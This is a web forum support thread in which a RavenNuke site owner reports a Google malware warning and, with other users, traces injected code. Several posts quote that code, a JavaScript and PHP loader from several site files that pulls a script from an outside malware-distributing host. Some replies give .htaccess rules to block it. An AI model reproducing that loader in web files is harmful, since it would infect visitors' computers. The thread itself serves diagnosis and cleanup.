Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> RavenNuke(tm) v2.5x
Author Message
Eduardo
Worker
Worker



Joined: Jul 20, 2004
Posts: 189
Location: Italy

PostPosted: Wed Oct 23, 2013 7:37 am Reply with quote

I installed a few weeks ago the version 2.51, but a few days access via a
search engine is prevented by this annoying notice:

Pericolo: malware in vista!
Google Chrome ha bloccato l'accesso a questa pagina su [ Only registered users can see links on this board! Get registered or login! ]
In questa pagina web sono stati inseriti contenuti di stepping-stones.ca, un noto
sito distributore di malware. Se visiti ora questa pagina, il tuo computer
potrebbe essere infettato con malware.
Il malware è un software dannoso che può causare furto d'identità, perdite
finanziarie ed eliminazione definitiva di file.Ulteriori informazioni
Indietro Dettagli su stepping-stones.ca Procedi a tuo rischio «
Migliora il rilevamento di malware inviando altri dati a Google quando vengono visualizzati
avvisi simili. Norme sulla privacy


http://www.continuummusicum.it/Warning_Google.pdf


A preliminary investigation of the problem I found the following line of
code:

Code:
*339810*/

document.write('<script type="text/javascript">var gwloaded =
false;</script><script src="http://stepping-stones.ca/modules/IR6Kh5cX.php"
type="text/javascript"></script>')
/*/339810*/


I would like to understand if it is a problem of the Raven Nuke script or if
there are weaknesses in the server that hosts me.
 
View user's profile Send private message
neralex
Site Admin



Joined: Aug 22, 2007
Posts: 1548

PostPosted: Wed Oct 23, 2013 9:11 am Reply with quote

In which file you have found this code? This posted code and also the file IR6Kh5cX.php in the modules-folders is not a part of the RN 251 package!

_________________
Github: RavenNuke 
View user's profile Send private message
Eduardo







PostPosted: Wed Oct 23, 2013 9:29 am Reply with quote

modules/GCalendar/displayCatLegend.js
 
Eduardo







PostPosted: Wed Oct 23, 2013 9:36 am Reply with quote

Also in header.php there is:
Code:
<?php

#339810#
if(empty($p)) {
$p = "<script type=\"text/javascript\">var gwloaded = false;</script>
<script src=\"http://stepping-stones.ca/modules/IR6Kh5cX.php\" type=\"text/javascript\"></script>";
echo $p;
}

#/339810#
?>
<?php

?>
<?php

?>
 
Eduardo







PostPosted: Wed Oct 23, 2013 9:43 am Reply with quote

includes/nukesentinel1_2_3_4.js and in many other files there is always:

Quote:
/*339810*/
document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://stepping-stones.ca/modules/IR6Kh5cX.php" type="text/javascript"></script>')
/*/339810*/
 
neralex







PostPosted: Wed Oct 23, 2013 9:48 am Reply with quote

Looks like a attack because in both files of the RN251 package isn't this code.

If you haven't made changes in these both files after the installation of RN251, then i would download the both infected files to store it and after that i would overwrite both files with the original files from the download package of RN251.

I would also download the IR6Kh5cX.php and after that remove this file directly. Do you have checked this file? What is the code in there?

Do you have installed other modules after the installation of RN251? If yes, which modules?

Edit: Ok after i have seen your last posts, i would suggest you to delete all files and start from scratch with the install. It seems your system is compromised. But here the question again, do you have installed other modules?
 
neralex







PostPosted: Wed Oct 23, 2013 10:12 am Reply with quote

Ok i have downloaded the IR6Kh5cX.php from the posted link. In there is a javascript function, a part of the lightbox script. Inside the function it would open an iframe from the file gwframe2.html. Inside this html-file is also a js-function shows a installation of the VLC player but it would not install the VLC. I haven't tried to download these exe-files but it seems this is infected stuff.
 
wHiTeHaT
Life Cycles Becoming CPU Cycles



Joined: Jul 18, 2004
Posts: 578
Location: Netherlands

PostPosted: Wed Oct 23, 2013 11:59 am Reply with quote

Somehow this gives me concernings.
i looked at your website and it seem you have not installed any 3th party modules , except RN gallery.
your_account login is also infected:
[ Only registered users can see links on this board! Get registered or login! ]

Code:


var gwloaded = false; " />
 
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
neralex







PostPosted: Wed Oct 23, 2013 12:38 pm Reply with quote

Ok then it could be a provider issue because no one of the currently installed modules can't write in the modules- or in the includes-folder. To create and change files with php its need a write access on files and folders.
 
nuken
RavenNuke(tm) Development Team



Joined: Mar 11, 2007
Posts: 2024
Location: North Carolina

PostPosted: Wed Oct 23, 2013 12:50 pm Reply with quote

It could be another site on a shared server that is infected which is also infecting your site. I have also heard of a windows virus that attacks servers through ftp with an attack meant for wordpress sites.

_________________
Tricked Out News 
View user's profile Send private message Send e-mail Visit poster's website
Guardian2003
Site Admin



Joined: Aug 28, 2003
Posts: 6795
Location: Ha Noi, Viet Nam

PostPosted: Wed Oct 23, 2013 2:13 pm Reply with quote

Also, please check the .htaccess file in your website root, in particular look for "prepend"
 
View user's profile Send private message Send e-mail
Eduardo







PostPosted: Thu Oct 24, 2013 12:32 am Reply with quote

The inconvenience has occurred three times, I installed the script again without solving.
The provider says that the problem is caused by some form of the script.
Following provider letter:

Gentile Cliente,

in merito alla sua segnalazione abbiamo effettuato le opportune verifiche individuando alcuni file nei quali è stato inserito codice malevolo e la informiamo che dalle nostre analisi riteniamo che la causa siano Trojan che provvedono ad infettare il Client per effettuare lo "stealing" dei dati sensibili quali dati di accesso Ftp e Carte di Credito per poi utilizzare questi ultimi per infettare altri pagine e diffondere ulteriormente il Trojan.

Abbiamo provveduto ad inserire all'interno della root del Suo dominio il file aruba.log, contenente la lista dei file corrotti.

Tra questi Trojan si denotano "Zeus" e "Gumblar" e "Koobface" dei quali potrà trovare informazioni dettagliate ai seguenti links di note società di Sicurezza:
[ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ]
[ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ]

Come si riscontra da tali link questi Malware infettano i Pc dei Client e provvedono a rubare i dati di accesso Ftp e in un secondo momento ad utilizzarli in massa per effettuare iniezioni di codice al fine di infettare il maggior numero di siti così da propagare la diffusione del Malware. Teniamo a sottolineare che i Trojan di ultima generazione quali quelli indicati non sono rilevati dai maggiori Antivirus poiché utilizzano tecniche di infezione che modificano il "kernel" del sistema operativo rendendo loro stessi invisibili.
[ Only registered users can see links on this board! Get registered or login! ]

All'url indicato potrà trovare una lista di tutti i maggiori AntiVirus vulnerabili a tali generi di Malware.

"...The virus will find FTP clients such as FileZilla and Dreamweaver and download the clients' stored passwords. It also enabled promiscuous mode on the network card, allowing it to sniff local network traffic for FTP details. It is one of the first viruses to incorporate an automated network sniffer...

...using passwords obtained from site admins, the host site will access a website via FTP and infect the website...."

Da tali informazioni e dalle verifiche effettuate riteniamo che la problematica da lei riscontrata scaturisca da tale infezione la invitiamo gentilmente ad effettuare una approfondita scansione delle postazioni da lei utilizzate per gestire il suo sito con il seguente Removal Tool:
[ Only registered users can see links on this board! Get registered or login! ]

Qualora tale software individui infezioni nella sua postazione la invitiamo gentilmente a fornirci i risultati e ad indicarci il nome del Malware/Trojan individuato così da avere maggiori informazioni al riguardo.

Una volta effettuata tale pulizia la invitiamo ad effettuare un cambio password dei dati di accesso così da avere la certezza che non siano tra quelli utilizzati da coloro che hanno creato tale Botnet.
[ Only registered users can see links on this board! Get registered or login! ]

La nuova Password deve mantenere i seguenti criteri:
- lunghezza compresa fra 8 e 13 caratteri;
- formato alfanumerico (deve quindi contenere sia lettere che numeri)
- diversa dalle password utilizzate in precedenza

Oltre ciò raccomandiamo di effettuare le consuete operazioni per mantenere sicuro il proprio Pc aggiornando costantemente i Software Antivirus e AntiMalware utilizzati.

Per maggiori informazioni la invitiamo a far riferimento al seguente articolo:
[ Only registered users can see links on this board! Get registered or login! ]

Le facciamo presente che sono stati implementati i protocolli di Sicurezza SFTP, HTTPS,etc. pertanto la invitiamo a configurare il suo Client Ftp come da indicazioni riportate al seguente link:
[ Only registered users can see links on this board! Get registered or login! ]

Infine, sempre per garantire la sicurezza la informiamo è abilitato il Filtro Ip che consente di abilitare solo un ristretto numero di Ip all'accesso all'Ftp così da evitare accessi da parte di malintenzionati:
[ Only registered users can see links on this board! Get registered or login! ]

Restiamo a disposizione per eventuali chiarimenti.

Cordiali Saluti.
=====================
Luigi Carafa [ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ]
n° centralino: 0575/0505
n° fax: 0575 862000
=====================



I do not know what to do.
 
Eduardo







PostPosted: Thu Oct 24, 2013 12:57 am Reply with quote

Google, to get rid of this problem forced me to place in the root a file with the following name:
www-continuummusicum-it_20131009T160221Z_MalwareUrlList.csv

The contents of the file is:

URL,Tipo,Ultimo controllo [ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ]

24 hours after the insertion everything worked perfectly but only after a few days the problem occurred again.

I can not understand who authorizes Google to make this intervention.

I hope you manage to figure out what's going on!
 
Eduardo







PostPosted: Thu Oct 24, 2013 2:02 am Reply with quote

Guardian2003 wrote:
Also, please check the .htaccess file in your website root, in particular look for "prepend"


In the root .htaccess file does not exist.
 
Eduardo







PostPosted: Thu Oct 24, 2013 2:07 am Reply with quote

nuken wrote:
It could be another site on a shared server that is infected which is also infecting your site. I have also heard of a windows virus that attacks servers through ftp with an attack meant for wordpress sites.


The provider, [ Only registered users can see links on this board! Get registered or login! ] told me that the servers have not suffered any attack.
 
Eduardo







PostPosted: Thu Oct 24, 2013 2:13 am Reply with quote

wHiTeHaT wrote:
Somehow this gives me concernings.
i looked at your website and it seem you have not installed any 3th party modules , except RN gallery.
your_account login is also infected:
[ Only registered users can see links on this board! Get registered or login! ]

Please, where you can find:

Code:


var gwloaded = false; " />
 
Eduardo







PostPosted: Thu Oct 24, 2013 4:29 am Reply with quote

This is the final consideration of the provider ARUBA:

Gentile Cliente,

in merito alla sua segnalazione, La informiamo che abbiamo effettuato le opportune verifiche e riteniamo che le oeprazioni di Hacking che han portato alla modifica delle Sue pagine sono state possibili a causa di alcune vulnerabilità note del Cms PHP Nuke e dei componenti da Lei utilizzati.

Al fine di evitare in futuro il ripetersi di tali eventi la invitiamo a consultare periodicamente siti di sicurezza quali
[ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ]

dove vengono rese note le nuove vulnerabilità scoperte per script quali, in questo caso, PHP Nuke e relativi componenti.


Per una sua maggiore sicurezza la invitiamo ad effettuare nuovamente una richiesta per il cambio della password di gestione del suo spazio web. Può provvedere a cambiare la password di gestione inerente la [ Only registered users can see links on this board! Get registered or login! ] in totale autonomia accedendo presso il nostro sito on line all'indirizzo
[ Only registered users can see links on this board! Get registered or login! ]

La nuova Password deve mantenere i seguenti criteri:
- lunghezza compresa fra 8 e 13 caratteri;
- formato alfanumerico (deve quindi contenere sia lettere che numeri)
- diversa dalle password utilizzate in precedenza

Per cambiare le credenziali del MySQL, invece, faccia riferimento al seguente link:
[ Only registered users can see links on this board! Get registered or login! ]

Al fine di ripristinare quanto prima la corretta visibilità del Suo sito La invitiamo ad effettuare un reset del Suo spazio web tramite l'apposita procedura:
[ Only registered users can see links on this board! Get registered or login! ]

a recuperare una copia di Backup non corrotta in Suo possesso e, successivamente, a ripristinare tutti i file nella root del Suo sito. Fatto ciò La invitiamo a provvedere ad aggiornare il suo PHP Nuke all'ultima versione 8.2.

Restiamo a disposizione per eventuali chiarimenti.

Cordiali Saluti
=====================
Fabrizio Puce [ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ]
n° centralino: 0575/0505
n° fax: 0575 862000
=====================
 
Guardian2003







PostPosted: Thu Oct 24, 2013 5:05 am Reply with quote

If your PC is infected with the Koobface virus, it is extremely difficult to get rid of.

I'm not sure what to recommend for you. Your provider seems to think you are using php-nuke which you are not and they recommend "upgrading to php-nuke 8.2", which considering you are not using php-nuke is a bit silly and there is NO difference any way between 8.2, 8.1 and 7.9.

I also find it hard to believe they have not had any server attacks, I get around a dozen root access attacks every week and there is not a public server anywhere in the world that doesnt get hack attempts.

This is going to be extremely difficult to diagnose and fix. If your computer is infected you'll need to get rid of that infection before trying to fix the website.
Please remember that it is highly likely that the infection is on another website on the server and is being transferred to your account.

I got rid of a similar problem on a clients website by downloading the files from the server and running Beyond Compare to compare the original files downloaded from here and the ones on the server (you need to make sure you have "show invisible files" turned on because in my case, it was some code added to a htaccess file that was altering all the other files.
 
Guardian2003







PostPosted: Thu Oct 24, 2013 6:21 pm Reply with quote

You might also want to add something like this in your htaccess file to try and stop the javascript from the infected site firing
Code:


RewriteEngine on
RewriteCond %{HTTP_REFERER} stepping-stones\.ca [NC]
RewriteRule .* - [F]


Or you could block the IP of that website
deny from 74.220.215.75
 
Eduardo







PostPosted: Sat Oct 26, 2013 1:40 am Reply with quote

Guardian2003 wrote:

Or you could block the IP of that website
deny from 74.220.215.75


This action should I do with the Sentinel module?

By Bloched IP Menu ?
 
misterstereus
Hangin' Around



Joined: Aug 03, 2012
Posts: 47
Location: Rome Italy

PostPosted: Sat Oct 26, 2013 2:11 am Reply with quote

Eduardo add me on Skype search misterstereus
 
View user's profile Send private message Send e-mail Visit poster's website
Guardian2003







PostPosted: Sat Oct 26, 2013 11:25 am Reply with quote

Euduardo, you can add it directly in your htaccess file
Code:


# -------------------------------------------
# Start of NukeSentinel(tm) DENY FROM area
# -------------------------------------------
deny from 74.220.215.75

If Nuke Sentinel is set up correctly and can write to your htaccess file then you can use the NS IP blocker and it will automatically add the code to your htaccess file
 
Eduardo







PostPosted: Sun Oct 27, 2013 3:26 am Reply with quote

Please, tell me if the following setting is correct:



If everything is OK, what should I do?


Last edited by Eduardo on Mon Oct 28, 2013 2:01 am; edited 1 time in total 
hicuxunicorniobestbuildpc
The Mouse Is Extension Of Arm



Joined: Aug 13, 2009
Posts: 1015
Location: Netherland

PostPosted: Sun Oct 27, 2013 4:05 am Reply with quote

No Eduardo, this is not correct since you are running php as CGI u need to fill with this lines all empty field in the bottom and SAVE CHANGES

Code:
/web/htdocs/www.continuummusicum.it/home/.htaccess

/web/htdocs/www.continuummusicum.it/home/.staccess
/web/htdocs/www.continuummusicum.it/home/.ftaccess
 
View user's profile Send private message Visit poster's website
Eduardo







PostPosted: Sun Oct 27, 2013 4:15 am Reply with quote

Please, if

Admin Auth: off

Is it correct only:

htaccess Path: /web/htdocs/www.continuummusicum.it/home/.htaccess ?

or all empty?
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> RavenNuke(tm) v2.5x

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©